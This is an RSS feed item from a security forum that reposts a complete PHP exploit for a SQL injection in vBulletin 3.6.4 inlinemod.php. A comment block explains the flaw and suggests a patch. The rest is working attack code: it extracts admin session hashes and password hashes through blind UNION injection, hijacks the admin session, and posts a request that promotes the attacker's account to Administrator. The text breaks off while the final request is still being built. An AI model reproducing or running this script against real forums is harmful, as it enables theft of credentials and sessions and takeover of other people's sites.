<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
	<channel>
		<title><![CDATA[Latest posts for the topic "vBulletin 3.6.4 Remote SQL Injection Exploit"]]></title>
		<link>http://www.hvaonline.net/hvaonline/posts/list/13.hva</link>
		<description><![CDATA[Latest messages posted in the topic "vBulletin 3.6.4 Remote SQL Injection Exploit"]]></description>
		<generator>JForum - http://www.jforum.net</generator>
			<item>
				<title>vBulletin 3.6.4 Remote SQL Injection Exploit</title>
				<description><![CDATA[ vBulletin &lt;= 3.6.4 (inlinemod.php postids) Remote SQL Injection Exploit

<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>&lt;?php
print_r&#40;'
-----------------------------------------------------------------------------
vBulletin &lt;= 3.6.4 inlinemod.php "postids" sql injection / privilege
escalation by session hijacking exploit
by rgod
mail: retrog at alice dot it
site:<span class="link"> http://retrogod.altervista.org</span>

Works regardless of php.ini settings, you need a Super Moderator account
to copy posts among threads, to be launched while admin is logged in to
the control panel, this will give you full admin privileges
note: this will flood the forum with empty threads even!
-----------------------------------------------------------------------------
'&#41;;

if &#40;$argc&lt;7&#41; {
print_r&#40;'
-----------------------------------------------------------------------------
Usage: php '.$argv&#91;0&#93;.' host path user pass forumid postid OPTIONS
host:      target server &#40;ip/hostname&#41;
path:      path to vbulletin
user/pass: you need a moderator account
forumid:   existing forum
postid:    existing post
Options:
 -p&#91;port&#93;:    specify a port other than 80
 -P&#91;ip:port&#93;: specify a proxy
Example:
php '.$argv&#91;0&#93;.' localhost /vbulletin/ rgod mypass 2 121 -P1.1.1.1:80
php '.$argv&#91;0&#93;.' localhost /vbulletin/ rgod mypass 1 143 -p81
-----------------------------------------------------------------------------
'&#41;;
die;
}
/*
vulnerable code in inlinemod.php near lines 185-209:

...
	case 'docopyposts':

		$vbulletin-&gt;input-&gt;clean_array_gpc&#40;'p', array&#40;
			'postids' =&gt; TYPE_STR,
		&#41;&#41;;

		$postids = explode&#40;',', $vbulletin-&gt;GPC&#91;'postids'&#93;&#41;;
		foreach &#40;$postids AS $index =&gt; $postid&#41;
		{
			if &#40;$postids&#91;"$index"&#93; != intval&#40;$postid&#41;&#41;
			{
				unset&#40;$postids&#91;"$index"&#93;&#41;;
			}
		}

		if &#40;empty&#40;$postids&#41;&#41;
		{
			eval&#40;standard_error&#40;fetch_error&#40;'no_applicable_posts_selected'&#41;&#41;&#41;;
		}

		if &#40;count&#40;$postids&#41; &gt; $postlimit&#41;
		{
			eval&#40;standard_error&#40;fetch_error&#40;'you_are_limited_to_working_with_x_posts', $postlimit&#41;&#41;&#41;;
		}
		break;
...
when an element of $postids array is not an integer, it fails to unset&#40;&#41; the proper value.

An example:

&lt;?php
$foo&#91;1&#93;="99999&#41; UNION SELECT foo FROM foo WHERE foo=1 LIMIT 1/*";
$foo&#91;2&#93;=intval&#40;$foo&#91;1&#93;&#41;;

echo $foo&#91;1&#93;."\n";
echo $foo&#91;2&#93;."\n";
if &#40;$foo&#91;1&#93; != $foo&#91;2&#93;&#41;
{
 echo "they are different";
}
else
{
 echo "they match!";
}
?&gt;

output:

99999&#41; UNION SELECT foo FROM foo WHERE foo=1 LIMIT 1/*
99999
they match!

this because when php tries to comparise a string with an integer
it tries to convert the string in its integer value, it chooses the first integer chars
of the string itself!
so unset&#40;&#41; never run!

the result is sql injection near lines 3792-3800:

...
	$posts = $db-&gt;query_read_slave&#40;"
		SELECT post.postid, post.threadid, post.visible, post.title, post.username, post.dateline, post.parentid, post.userid,
			thread.forumid, thread.title AS thread_title, thread.postuserid, thread.visible AS thread_visible, thread.firstpostid,
			thread.sticky, thread.open, thread.iconid
		FROM " . TABLE_PREFIX . "post AS post
		LEFT JOIN " . TABLE_PREFIX . "thread AS thread USING &#40;threadid&#41;
		WHERE postid IN &#40;" . implode&#40;',', $postids&#41; . "&#41;
		ORDER BY post.dateline
	"&#41;;
...

this exploit extract various session hashes from the database
to authenticate as admin and to change the privileges of a registered user
I could not find a way to see results inside html, so this asks true/false
questions to the database, copying posts around threads

possible patch, replace:
foreach &#40;$postids AS $index =&gt; $postid&#41;
		{
		   	if &#40;$postids&#91;"$index"&#93; != intval&#40;$postid&#41;&#41;
			{
			    unset&#40;$postids&#91;"$index"&#93;&#41;;
			}
		}

with:

foreach &#40;$postids AS $index =&gt; $postid&#41;
		{
	       $postids&#91;"$index"&#93;=&#40;int&#41;$postids&#91;"$index"&#93;;
	    }


and, some line before:

foreach &#40;$threadids AS $index =&gt; $threadid&#41;
		{
			if &#40;$threadids&#91;"$index"&#93; != intval&#40;$threadid&#41;&#41;
			{
				unset&#40;$threadids&#91;"$index"&#93;&#41;;
			}
		}

with:

foreach &#40;$threadids AS $index =&gt; $threadid&#41;
		{
	       $threadids&#91;"$index"&#93;=&#40;int&#41;$threadids&#91;"$index"&#93;;
	    }


vendor was contacted by email form...
*/

error_reporting&#40;7&#41;;
ini_set&#40;"max_execution_time",0&#41;;
ini_set&#40;"default_socket_timeout",5&#41;;

function quick_dump&#40;$string&#41;
{
  $result='';$exa='';$cont=0;
  for &#40;$i=0; $i&lt;=strlen&#40;$string&#41;-1; $i++&#41;
  {
   if &#40;&#40;ord&#40;$string&#91;$i&#93;&#41; &lt;= 32 &#41; | &#40;ord&#40;$string&#91;$i&#93;&#41; &gt; 126 &#41;&#41;
   {$result.="  .";}
   else
   {$result.="  ".$string&#91;$i&#93;;}
   if &#40;strlen&#40;dechex&#40;ord&#40;$string&#91;$i&#93;&#41;&#41;&#41;==2&#41;
   {$exa.=" ".dechex&#40;ord&#40;$string&#91;$i&#93;&#41;&#41;;}
   else
   {$exa.=" 0".dechex&#40;ord&#40;$string&#91;$i&#93;&#41;&#41;;}
   $cont++;if &#40;$cont==15&#41; {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '&#40;\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b&#41;';
function sendpacketii&#40;$packet&#41;
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if &#40;$proxy==''&#41; {
    $ock=fsockopen&#40;gethostbyname&#40;$host&#41;,$port&#41;;
    if &#40;!$ock&#41; {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match&#40;$proxy_regex,$proxy&#41;;
    if &#40;!$c&#41; {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode&#40;':',$proxy&#41;;
    echo "Connecting to ".$parts&#91;0&#93;.":".$parts&#91;1&#93;." proxy...\r\n";
    $ock=fsockopen&#40;$parts&#91;0&#93;,$parts&#91;1&#93;&#41;;
    if &#40;!$ock&#41; {
      echo 'No response from proxy...';die;
	}
  }
  fputs&#40;$ock,$packet&#41;;
  if &#40;$proxy==''&#41; {
    $html='';
    while &#40;!feof&#40;$ock&#41;&#41; {
      $html.=fgets&#40;$ock&#41;;
    }
  }
  else {
    $html='';
    while &#40;&#40;!feof&#40;$ock&#41;&#41; or &#40;!eregi&#40;chr&#40;0x0d&#41;.chr&#40;0x0a&#41;.chr&#40;0x0d&#41;.chr&#40;0x0a&#41;,$html&#41;&#41;&#41; {
      $html.=fread&#40;$ock,1&#41;;
    }
  }
  fclose&#40;$ock&#41;;
}

$host=$argv&#91;1&#93;;
$path=$argv&#91;2&#93;;
$user=$argv&#91;3&#93;;
$pass=md5&#40;$argv&#91;4&#93;&#41;;
$forumid=&#40;int&#41;$argv&#91;5&#93;;
$existing_post=&#40;int&#41;$argv&#91;6&#93;;

$port=80;
$proxy="";
for &#40;$i=3; $i&lt;$argc; $i++&#41;{
$temp=$argv&#91;$i&#93;&#91;0&#93;.$argv&#91;$i&#93;&#91;1&#93;;
if &#40;&#40;$temp&lt;&gt;"-p"&#41; and &#40;$temp&lt;&gt;"-P"&#41;&#41; {$cmd.=" ".$argv&#91;$i&#93;;}
if &#40;$temp=="-p"&#41;
{
  $port=str_replace&#40;"-p","",$argv&#91;$i&#93;&#41;;
}
if &#40;$temp=="-P"&#41;
{
  $proxy=str_replace&#40;"-P","",$argv&#91;$i&#93;&#41;;
}
}
if &#40;&#40;$path&#91;0&#93;&lt;&gt;'/'&#41; or &#40;$path&#91;strlen&#40;$path&#41;-1&#93;&lt;&gt;'/'&#41;&#41; {echo 'Error... check the path!'; die;}
if &#40;$proxy==''&#41; {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$data="vb_login_username=$user";
$data.="&vb_login_password=";
$data.="&s=";
$data.="&do=login";
$data.="&vb_login_md5password=$pass";
$data.="&vb_login_md5password_utf=$pass";
$packet="POST ".$p."login.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer:<span class="link"> http://</span>".$host.$path."login.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 &#40;compatible; MSIE 7.0; Windows NT 5.1&#41;\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen&#40;$data&#41;."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii&#40;$packet&#41;;
$cookie="";
$temp=explode&#40;"Set-Cookie: ",$html&#41;;
for &#40;$i=1; $i&lt;count&#40;$temp&#41;; $i++&#41;
{
  $temp2=explode&#40;" ",$temp&#91;$i&#93;&#41;;
  $cookie.=" ".trim&#40;$temp2&#91;0&#93;&#41;;
}
//echo "your cookie -&gt; ".$cookie."\n\n";
if &#40;!eregi&#40;"sessionhash",$cookie&#41;&#41;{die&#40;"failed to login..."&#41;;}$temp=str_replace&#40;" ","",$cookie&#41;;$temp=str_replace&#40;"sessionhash","",$temp&#41;;
$temp=str_replace&#40;"lastvisit","",$temp&#41;;$temp=str_replace&#40;"lastactivity","",$temp&#41;;$temp=explode&#40;"=",$temp&#41;;$temp=explode&#40;";",$temp&#91;1&#93;&#41;;
$cookie_prefix=trim&#40;$temp&#91;1&#93;&#41;;echo "cookie prefix -&gt; ".$cookie_prefix."\n";

$chars&#91;0&#93;=0;//null
$chars=array_merge&#40;$chars,range&#40;48,57&#41;&#41;; //numbers

$j=1;$uid="";
echo "admim user id -&gt; ";
while &#40;!strstr&#40;$uid,chr&#40;0&#41;&#41;&#41;
{
    for &#40;$i=0; $i&lt;=255; $i++&#41;
    {
        if &#40;in_array&#40;$i,$chars&#41;&#41;
        {
          $data ="s=";
          $data.="&do=docopyposts";
          $data.="&destforumid=$forumid";
          $data.="&title=suntzu";
          $data.="&forumid=$forumid";
          $data.="&postids=9999999&#41;/**/UNION/**/SELECT/**/&#40;IF&#40;&#40;ASCII&#40;SUBSTRING&#40;userid,".$j.",1&#41;&#41;=".$i."&#41;,$existing_post,-999999&#41;&#41;,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/usergroupid=6/**/LIMIT/**/1/*";
          $packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n";
          $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
          $packet.="Referer:<span class="link"> http://</span>".$host.$path."profile.php\r\n";
          $packet.="Accept-Language: it\r\n";
          $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
          $packet.="User-Agent: Mozilla/4.0 &#40;compatible; MSIE 7.0; Windows NT 5.1&#41;\r\n";
          $packet.="Host: ".$host."\r\n";
          $packet.="Content-Length: ".strlen&#40;$data&#41;."\r\n";
          $packet.="Pragma: no-cache\r\n";
          $packet.="Cookie: ".$cookie."; \r\n";
          $packet.="Connection: Close\r\n\r\n";
          $packet.=$data;
          sendpacketii&#40;$packet&#41;;
          $temp=explode&#40;"showthread.php?t=",$html&#41;;
          $temp2=explode&#40;"\n",$temp&#91;1&#93;&#41;;
          $thread=&#40;int&#41;$temp2&#91;0&#93;;

          $packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n";
          $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
          $packet.="Referer:<span class="link"> http://</span>".$host.$path."profile.php\r\n";
          $packet.="Accept-Language: it\r\n";
          $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
          $packet.="User-Agent: Mozilla/4.0 &#40;compatible; MSIE 7.0; Windows NT 5.1&#41;\r\n";
          $packet.="Host: ".$host."\r\n";
          $packet.="Pragma: no-cache\r\n";
          $packet.="Cookie: ".$cookie."; \r\n";
          $packet.="Connection: Close\r\n\r\n";
          sendpacketii&#40;$packet&#41;;
          if &#40;eregi&#40;"You have an error in your SQL syntax",$html&#41;&#41;{echo $html; die&#40;"\nunknown query error..."&#41;;}
          if &#40;eregi&#40;"join date",$html&#41;&#41; {$uid.=chr&#40;$i&#41;;echo chr&#40;$i&#41;; sleep&#40;1&#41;; break;}
        }
        if &#40;$i==255&#41; {
            die&#40;"\nExploit failed..."&#41;;
        }
    }
$j++;
}
if &#40;trim&#40;$uid&#41;==""&#41;{die&#40;"\nExploit failed..."&#41;;}else{echo "\nvulnerable!";}
$uid=intval&#40;$uid&#41;;

function my_encode&#40;$my_string&#41;
{
  $encoded="CHAR&#40;";
  for &#40;$k=0; $k&lt;=strlen&#40;$my_string&#41;-1; $k++&#41;
  {
    $encoded.=ord&#40;$my_string&#91;$k&#93;&#41;;
    if &#40;$k==strlen&#40;$my_string&#41;-1&#41; {$encoded.="&#41;";}
    else {$encoded.=",";}
  }
  return $encoded;
}


$j=1;$my_uid="";
echo "\nyour user id -&gt; ";
while &#40;!strstr&#40;$my_uid,chr&#40;0&#41;&#41;&#41;
{
    for &#40;$i=0; $i&lt;=255; $i++&#41;
    {
        if &#40;in_array&#40;$i,$chars&#41;&#41;
        {
          $data ="s=";
          $data.="&do=docopyposts";
          $data.="&destforumid=$forumid";
          $data.="&title=suntzu";
          $data.="&forumid=$forumid";
          $data.="&postids=9999999&#41;/**/UNION/**/SELECT/**/&#40;IF&#40;&#40;ASCII&#40;SUBSTRING&#40;userid,".$j.",1&#41;&#41;=".$i."&#41;,$existing_post,-999999&#41;&#41;,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/username=".my_encode&#40;$user&#41;."/**/LIMIT/**/1/*";
          $packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n";
          $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
          $packet.="Referer:<span class="link"> http://</span>".$host.$path."profile.php\r\n";
          $packet.="Accept-Language: it\r\n";
          $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
          $packet.="User-Agent: Mozilla/4.0 &#40;compatible; MSIE 7.0; Windows NT 5.1&#41;\r\n";
          $packet.="Host: ".$host."\r\n";
          $packet.="Content-Length: ".strlen&#40;$data&#41;."\r\n";
          $packet.="Pragma: no-cache\r\n";
          $packet.="Cookie: ".$cookie."; \r\n";
          $packet.="Connection: Close\r\n\r\n";
          $packet.=$data;
          sendpacketii&#40;$packet&#41;;
          if &#40;eregi&#40;"You have an error in your SQL syntax",$html&#41;&#41;{echo $html; die&#40;"\nunknown query error..."&#41;;}
          $temp=explode&#40;"showthread.php?t=",$html&#41;;
          $temp2=explode&#40;"\n",$temp&#91;1&#93;&#41;;
          $thread=&#40;int&#41;$temp2&#91;0&#93;;

          $packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n";
          $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
          $packet.="Referer:<span class="link"> http://</span>".$host.$path."profile.php\r\n";
          $packet.="Accept-Language: it\r\n";
          $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
          $packet.="User-Agent: Mozilla/4.0 &#40;compatible; MSIE 7.0; Windows NT 5.1&#41;\r\n";
          $packet.="Host: ".$host."\r\n";
          $packet.="Pragma: no-cache\r\n";
          $packet.="Cookie: ".$cookie."; \r\n";
          $packet.="Connection: Close\r\n\r\n";
          sendpacketii&#40;$packet&#41;;
          if &#40;eregi&#40;"join date",$html&#41;&#41; {$my_uid.=chr&#40;$i&#41;;echo chr&#40;$i&#41;; sleep&#40;1&#41;; break;}
        }
        if &#40;$i==255&#41; {
            die&#40;"\nExploit failed..."&#41;;
        }
    }
$j++;
}
$my_uid=intval&#40;$my_uid&#41;;

$chars&#91;0&#93;=0;//null
$chars=array_merge&#40;$chars,range&#40;48,57&#41;&#41;; //numbers
$chars=array_merge&#40;$chars,range&#40;97,102&#41;&#41;;//a-f letters
$j=1;$sess_hash="";
echo "\nsession hash -&gt; ";
while &#40;!strstr&#40;$sess_hash,chr&#40;0&#41;&#41;&#41;
{
    for &#40;$i=0; $i&lt;=255; $i++&#41;
    {
      if &#40;in_array&#40;$i,$chars&#41;&#41;
        {
          $data ="s=";
          $data.="&do=docopyposts";
          $data.="&destforumid=$forumid";
          $data.="&title=suntzu";
          $data.="&forumid=$forumid";
          $data.="&postids=9999999&#41;/**/UNION/**/SELECT/**/&#40;IF&#40;&#40;ASCII&#40;SUBSTRING&#40;sessionhash,".$j.",1&#41;&#41;=".$i."&#41;,$existing_post,-999999&#41;&#41;,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/session/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*";
          $packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n";
          $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
          $packet.="Referer:<span class="link"> http://</span>".$host.$path."profile.php\r\n";
          $packet.="Accept-Language: it\r\n";
          $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
          $packet.="User-Agent: Mozilla/4.0 &#40;compatible; MSIE 7.0; Windows NT 5.1&#41;\r\n";
          $packet.="Host: ".$host."\r\n";
          $packet.="Content-Length: ".strlen&#40;$data&#41;."\r\n";
          $packet.="Pragma: no-cache\r\n";
          $packet.="Cookie: ".$cookie."; \r\n";
          $packet.="Connection: Close\r\n\r\n";
          $packet.=$data;
          sendpacketii&#40;$packet&#41;;
          if &#40;eregi&#40;"You have an error in your SQL syntax",$html&#41;&#41;{echo $html; die&#40;"\nunknown query error..."&#41;;}
          $temp=explode&#40;"showthread.php?t=",$html&#41;;
          $temp2=explode&#40;"\n",$temp&#91;1&#93;&#41;;
          $thread=&#40;int&#41;$temp2&#91;0&#93;;

          $packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n";
          $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
          $packet.="Referer:<span class="link"> http://</span>".$host.$path."profile.php\r\n";
          $packet.="Accept-Language: it\r\n";
          $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
          $packet.="User-Agent: Mozilla/4.0 &#40;compatible; MSIE 7.0; Windows NT 5.1&#41;\r\n";
          $packet.="Host: ".$host."\r\n";
          $packet.="Pragma: no-cache\r\n";
          $packet.="Cookie: ".$cookie."; \r\n";
          $packet.="Connection: Close\r\n\r\n";
          sendpacketii&#40;$packet&#41;;
          if &#40;eregi&#40;"join date",$html&#41;&#41; {$sess_hash.=chr&#40;$i&#41;;echo chr&#40;$i&#41;; sleep&#40;1&#41;; break;}
        }
        if &#40;$i==255&#41; {
            die&#40;"\nExploit failed..."&#41;;
        }
    }
$j++;
}

$j=1;$my_hash="";
echo "\nuser password hash -&gt; ";
while &#40;!strstr&#40;$my_hash,chr&#40;0&#41;&#41;&#41;
{
    for &#40;$i=0; $i&lt;=255; $i++&#41;
    {
      if &#40;in_array&#40;$i,$chars&#41;&#41;
        {
          $data ="s=";
          $data.="&do=docopyposts";
          $data.="&destforumid=$forumid";
          $data.="&title=suntzu";
          $data.="&forumid=$forumid";
          $data.="&postids=9999999&#41;/**/UNION/**/SELECT/**/&#40;IF&#40;&#40;ASCII&#40;SUBSTRING&#40;password,".$j.",1&#41;&#41;=".$i."&#41;,$existing_post,-999999&#41;&#41;,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*";
          $packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n";
          $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
          $packet.="Referer:<span class="link"> http://</span>".$host.$path."profile.php\r\n";
          $packet.="Accept-Language: en\r\n";
          $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
          $packet.="User-Agent: Mozilla/4.0 &#40;compatible; MSIE 7.0; Windows NT 5.1&#41;\r\n";
          $packet.="Host: ".$host."\r\n";
          $packet.="Content-Length: ".strlen&#40;$data&#41;."\r\n";
          $packet.="Pragma: no-cache\r\n";
          $packet.="Cookie: ".$cookie."; \r\n";
          $packet.="Connection: Close\r\n\r\n";
          $packet.=$data;
          sendpacketii&#40;$packet&#41;;
          if &#40;eregi&#40;"You have an error in your SQL syntax",$html&#41;&#41;{echo $html; die&#40;"\nunknown query error..."&#41;;}
          $temp=explode&#40;"showthread.php?t=",$html&#41;;
          $temp2=explode&#40;"\n",$temp&#91;1&#93;&#41;;
          $thread=&#40;int&#41;$temp2&#91;0&#93;;

		  $packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n";
          $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
          $packet.="Referer:<span class="link"> http://</span>".$host.$path."profile.php\r\n";
          $packet.="Accept-Language: en\r\n";
          $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
          $packet.="User-Agent: Mozilla/4.0 &#40;compatible; MSIE 7.0; Windows NT 5.1&#41;\r\n";
          $packet.="Host: ".$host."\r\n";
          $packet.="Pragma: no-cache\r\n";
          $packet.="Cookie: ".$cookie."; \r\n";
          $packet.="Connection: Close\r\n\r\n";
          sendpacketii&#40;$packet&#41;;
          if &#40;eregi&#40;"join date",$html&#41;&#41; {$my_hash.=chr&#40;$i&#41;;echo chr&#40;$i&#41;; sleep&#40;1&#41;; break;}
        }
        if &#40;$i==255&#41; {
            die&#40;"\nExploit failed..."&#41;;
        }
    }
$j++;
}

$j=1;$cpsess_hash="";
echo "\ncp session hash -&gt; ";
while &#40;!strstr&#40;$cpsess_hash,chr&#40;0&#41;&#41;&#41;
{
    for &#40;$i=0; $i&lt;=255; $i++&#41;
    {
      if &#40;in_array&#40;$i,$chars&#41;&#41;
        {
          $data ="s=";
          $data.="&do=docopyposts";
          $data.="&destforumid=$forumid";
          $data.="&title=suntzu";
          $data.="&forumid=$forumid";
          $data.="&postids=9999999&#41;/**/UNION/**/SELECT/**/&#40;IF&#40;&#40;ASCII&#40;SUBSTRING&#40;hash,".$j.",1&#41;&#41;=".$i."&#41;,$existing_post,-999999&#41;&#41;,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cpsession/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*";
          $packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n";
          $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
          $packet.="Referer:<span class="link"> http://</span>".$host.$path."profile.php\r\n";
          $packet.="Accept-Language: en\r\n";
          $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
          $packet.="User-Agent: Mozilla/4.0 &#40;compatible; MSIE 7.0; Windows NT 5.1&#41;\r\n";
          $packet.="Host: ".$host."\r\n";
          $packet.="Content-Length: ".strlen&#40;$data&#41;."\r\n";
          $packet.="Pragma: no-cache\r\n";
          $packet.="Cookie: ".$cookie."; \r\n";
          $packet.="Connection: Close\r\n\r\n";
          $packet.=$data;
          sendpacketii&#40;$packet&#41;;
          $temp=explode&#40;"showthread.php?t=",$html&#41;;
          $temp2=explode&#40;"\n",$temp&#91;1&#93;&#41;;
          $thread=&#40;int&#41;$temp2&#91;0&#93;;

          $packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n";
          $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
          $packet.="Referer:<span class="link"> http://</span>".$host.$path."profile.php\r\n";
          $packet.="Accept-Language: en\r\n";
          $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
          $packet.="User-Agent: Mozilla/4.0 &#40;compatible; MSIE 7.0; Windows NT 5.1&#41;\r\n";
          $packet.="Host: ".$host."\r\n";
          $packet.="Pragma: no-cache\r\n";
          $packet.="Cookie: ".$cookie."; \r\n";
          $packet.="Connection: Close\r\n\r\n";
          sendpacketii&#40;$packet&#41;;
          if &#40;eregi&#40;"You have an error in your SQL syntax",$html&#41;&#41;{echo $html; die&#40;"\nunknown query error..."&#41;;}
          if &#40;eregi&#40;"join date",$html&#41;&#41; {$cpsess_hash.=chr&#40;$i&#41;;echo chr&#40;$i&#41;; sleep&#40;1&#41;; break;}
        }
        if &#40;$i==255&#41; {
            die&#40;"\nExploit failed..."&#41;;
        }
    }
$j++;
}
echo "\n";

$packet ="GET ".$p."admincp/user.php?do=edit&u=$my_uid HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer:<span class="link"> http://</span>".$host.$path."profile.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 &#40;compatible; MSIE 7.0; Windows NT 5.1&#41;\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Cookie: ".$cookie_prefix."lastactivity=0; ".$cookie_prefix."password=".md5&#40;trim&#40;$my_hash&#41;&#41;."; bbuserid=".$uid."; ".$cookie_prefix."sessionhash=".trim&#40;$sess_hash&#41;."; ".$cookie_prefix."cpsession=".trim&#40;$cpsess_hash&#41;.";\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii&#40;$packet&#41;;
$temp=explode&#40;"adminhash\" value=\"",$html&#41;;
$temp2=explode&#40;"\"",$temp&#91;1&#93;&#41;;
$adminhash=$temp2&#91;0&#93;;
echo "adminhash -&gt;".$adminhash."\n";
if &#40;$adminhash&lt;&gt;""&#41; {echo "\ndone! you are in... updating ".$user." rights";}
else {die&#40;"\nexploit failed..."&#41;;}

//join to the Administrator group
$my_email="suntzu@suntzu.com";
$data ="do=update";
$data.="&adminhash=$adminhash";
$data.="&quicklinks=user.php%3Fdo%3Deditaccess%26u%3D".$my_uid;
$data.="&user%5Busername%5D=$user";
$data.="&password=";
$data.="&user%5Bemail%5D=$my_email";
$data.="&user%5Blanguageid%5D=0";
$data.="&user%5Busertitle%5D=Admin";
$data.="&user%5Bcustomtitle%5D=0";
$data.="&user%5Bhomepage%5D=";
$data.="&user%5Bbirthday%5D%5Bmonth%5D=0";
$data.="&user%5Bbirthday%5D%5Bday%5D=";
$data.="&user%5Bbirthday%5D%5Byear%5D=";
$data.="&user%5Bshowbirthday%5D=0";
$data.="&user%5Bsignature%5D=";
$data.="&user%5Bicq%5D=";
$data.="&user%5Baim%5D=";
$data.="&user%5Byahoo%5D=";
$data.="&user%5Bmsn%5D=";
$data.="&user%5Bskype%5D=";
$data.="&options%5Bcoppauser%5D=0";
$data.="&user%5Bparentemail%5D=$my_email";
$data.="&user%5Breferrerid%5D=";
$data.="&user%5Bipaddress%5D=";
$data.="&user%5Bposts%5D=0";
$data.="&userfield%5Bfield1%5D=";
$data.="&userfield%5Bfield2%5D=";
$data.="&userfield%5Bfield3%5D=";
$data.="&userfield%5Bfield4%5D=";
$data.="&user%5Busergroupid%5D=6";//primary usergroup, 6=Administrators
$data.="&user%5Bdisplaygroupid%5D=-1";
$data.="&user%5Bmembergroupids%5D%5B%5D=5";//secondary usergroup, 5=Super Moderators
$data.="&options%5Bshowreputation%5D=1";
$data.="&user%5Breputation%5D=10";
$data.="&user%5Bwarnings%5D=0";
$data.="&user%5Binfractions%5D=0";
$data.="&user%5Bipoints%5D=0";
$data.="&options%5Badminemail%5D=1";
$data.="&options%5Bshowemail%5D=0";
$data.="&options%5Binvisible%5D=0";
$data.="&options%5Bshowvcard%5D=0";
$data.="&options%5Breceivepm%5D=1";
$data.="&options%5Breceivepmbuddies%5D=0";
$data.="&options%5Bemailonpm%5D=0";
$data.="&user%5Bpmpopup%5D=0";
$data.="&options%5Bshowsignatures%5D=1";
$data.="&options%5Bshowavatars%5D=1";
$data.="&options%5Bshowimages%5D=1";
$data.="&user%5Bautosubscribe%5D=-1";
$data.="&user%5Bthreadedmode%5D=0";
$data.="&user%5Bshowvbcode%5D=1";
$data.="&user%5Bstyleid%5D=0";
$data.="&adminoptions%5Badminavatar%5D=0";
$data.="&adminoptions%5Badminprofilepic%5D=0";
$data.="&user%5Btimezoneoffset%5D=0";
$data.="&options%5Bdstauto%5D=1";
$data.="&options%5Bdstonoff%5D=0";
$data.="&user%5Bdaysprune%5D=-1";
$data.="&user%5Bjoindate%5D%5Bmonth%5D=2";
$data.="&user%5Bjoindate%5D%5Bday%5D=26";
$data.="&user%5Bjoindate%5D%5Byear%5D=2007";
$data.="&user%5Bjoindate%5D%5Bhour%5D=14";
$data.="&user%5Bjoindate%5D%5Bminute%5D=39";
$data.="&user%5Blastactivity%5D%5Bmonth%5D=2";
$data.="&user%5Blastactivity%5D%5Bday%5D=26";
$data.="&user%5Blastactivity%5D%5Byear%5D=2007";
